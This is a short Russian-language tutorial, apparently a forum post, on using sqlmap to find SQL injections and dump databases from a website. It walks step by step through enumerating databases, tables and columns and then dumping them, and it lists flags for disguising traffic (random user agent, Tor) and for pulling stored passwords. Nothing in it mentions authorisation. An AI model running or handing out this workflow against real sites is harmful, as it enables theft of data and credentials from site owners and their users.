Всем привет, сегодня мы с вами поговорим о такой утилите как sqlmap, и как же слить базы данных с сайта. Sqlmap - одна из утилит пентеста, которая автоматизирует процесс поиска и эксплуатации SQL-инъекций с целью извлечения данных или захвата удаленного хоста. Эта статья будет вводной, так как расписать весь функционал этой утилиты невозможно. Установка : apt update apt upgrade apt install python2 apt install git git clone sqlmapproject/sqlmap cd sqlmap Готово, на этом установка закончена, теперь мы разберемся с вариантами запуска : python2 sqlmap.py -u "url сайта без кавычек" —dbs Эта команда произведет проверку на уязвимость, и выдаст список баз python2 sqlmap.py -u "опять же url сайта без кавычек" —dbs —risk(1/3)/level(1/5) Эта команда уже будет копать глубже, а функция как и у первой. (риск и уровень на ваш выбор) Далее, если вам всё-таки удалось выявить базу данных, то ее можно посмотреть с помощью команды : python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" —tables Если вас заинтересовала какая-либо из колонок бд ,то пишем: python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" -T "название таблицы без кавычек" —columns Если вы хотите дампнуть (скачать) базу данных : python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" -T "название таблицы без кавычек" —dump Путь сохранения вам выдастся в конце операции. И ещё что я хотел бы написать в этой статье, это небольшая пояснялка, некоторые ключи : -u для указания URL-random-agent для снижения подозрительной активности-tor для использования защищенного канала-dbs смотрим какие базы доступны-table смотрим таблицу-columns смотрим колонки-dump скачиваем путь к базе-current-user инфо базы данных, включая ее название, номер версии, а также текущего пользователя-passwords сохраненные пароли в базе-level Эта опция требует аргумента, который определяет уровень тестов для выполнения. Существует пять уровней. Значение по умолчанию — 1, где выполняется ограниченное количество тестов (запросов). Напротив, уровень 5 будет тестировать гораздо больше скриптов и границ. Ну а на этом я закончу, статья пилотная, если вам понравится эта статья, то могу продемонстрировать пример использования данной утилиты. Всем спасибо за внимание! С наступившим!